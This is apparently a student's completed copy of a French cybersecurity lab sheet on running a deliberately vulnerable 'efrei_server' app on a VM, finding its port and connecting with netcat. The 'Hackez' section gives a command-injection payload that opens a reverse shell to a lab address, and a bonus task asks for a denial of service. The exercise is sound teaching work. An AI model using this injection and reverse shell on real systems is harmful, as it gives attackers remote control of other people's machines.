# I. Partie 1 : Host & Hack

Quand on doit héberger une nouvelle application, la première étape, c'est de regarder un peu ce qu'elle fait.  
On saura alors quoi faire pour l'héberger au mieux.

Comme j'ai sous-entendu en intro, il se peut que l'application soit *légèrement* vulnérable... Vous vous chargerez dans un **second** temps de trouver la vulnérabilité, et l'exploiter.  
**D'abord, on lance le machin, on voit ce que ça fait.**

## Sommaire

- [I. Partie 1 : Host \& Hack](#i-partie-1--host--hack)
  - [Sommaire](#sommaire)
  - [1. A vos marques](#1-a-vos-marques)
  - [2. Prêts](#2-prêts)
  - [3. Hackez](#3-hackez)

## 1. A vos marques

🌞 **Télécharger l'application depuis votre VM**

- une commande `wget` ou `curl` fait le taff
- c'est dispo sur ce dépôt git, c'est le fichier `efrei_server`

```bash
curl -SLO 'https://gitlab.com/it4lik/b3-csec-2024/-/raw/main/efrei_server?ref_type=heads&inline=false'
```

🌞 **Lancer l'application `efrei_server`**

- sur la VM hein :)
- lancer l'application à la main
- l'application va écouter sur l'IP `127.0.0.1` par défaut, il faudra la lancer avec une variable d'environnement définie pour changer ça
- 
```bash
chmod +x efrei_serveur
./efrei_serveurx²
```

> *Appelez-moi vite s'il ne se lance pas, c'est censé être un truc très simple qui juste fonctionne.*

➜ **Pour lancer une commande en définissant une variable d'environnement à la volée**, on peut faire comme ça :
w

🌞 **Prouvez que l'application écoute sur l'IP que vous avez spécifiée**

- profitez-en pour repérer le port TCP sur lequel écoute l'application
- ça se fait en une seule commande `ss`
- filtrez la sortie de la commande avec un `| grep` pour mettre en évidence la ligne intéressante dans le compte-rendu
```
[pastoufle@efrei-xmg4agau1 ~]$ ss -lnt
State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process         
LISTEN          0               100                          127.0.0.1:8888                        0.0.0.0:*                            
LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                            
LISTEN          0               128                               [::]:22                             [::]:*                            

```

## 2. Prêts

🌞 **Se connecter à l'application depuis votre PC**

- depuis votre PC ! (pas depuis une VM)
- depuis votre PC, utilisez une commande `nc` (netcat) pour vous connecter à l'application
  - il faudra l'installer si vous ne l'avez pas sur votre PC :)
- il faudra ouvrir un port firewall sur la VM (celui sur lequel écoute `efrei_server`, que vous avez repéré à l'étape précédente) pour qu'un client puisse se connecter

```bash
# avec netcat, vous pourrez vous connecter en saissant :
nc 192.168.56.105 8888
```

## 3. Hackez

🌞 **Euh bah... hackez l'application !**

- elle est vulnérable
- c'est un cas d'école, je pense que ça prendra pas longtemps à la plupart d'entre vous :d
- bref, en tant que clients, vous pouvez avoir un shell sur la machine serveur, et exécuter des commandes
```bash
; sh -i >& /dev/tcp/192.168.56.1/9001 0>&1
```

> N'hésitez pas à me demander de l'aide pour cette section si c'est po clair ni intuitif pour vous.

🌟 **BONUS : DOS l'application**

- il faut rendre l'application inopérante
- pour être précis, un DOS ici, c'est qu'aucun autre client ne doit pouvoir se connecter
- utilisez un autre vecteur que la vulnérabilité précédente pour provoquer le DOS

![Hac](./img/hac.png)

---

➜ **BON** on a une application qui tourne sur une machine Linux, à l'arrache.  
**Nos dévs sont nuls, l'app est vulnérable.** 🙃

> *ui c moa le dév é alor ?!*

Dans le reste du TP, **on va continuer à bosser sur l'hébergement mais en sachant ça : l'app est vulnérable.**  
Notre but va donc être de proposer l'hébergement de cette application vulnérable, mais en **minimisant l'impact de cette vulnérabilité** le plus possible.

➜ **Comment héberger une application vulnérable et dormir (à peu près) sur ses deux oreilles ?**

> *Bonne question Jamy ! Continuons le TP :d*

> ➜ [**Lien vers la partie 2**](./part2.md)
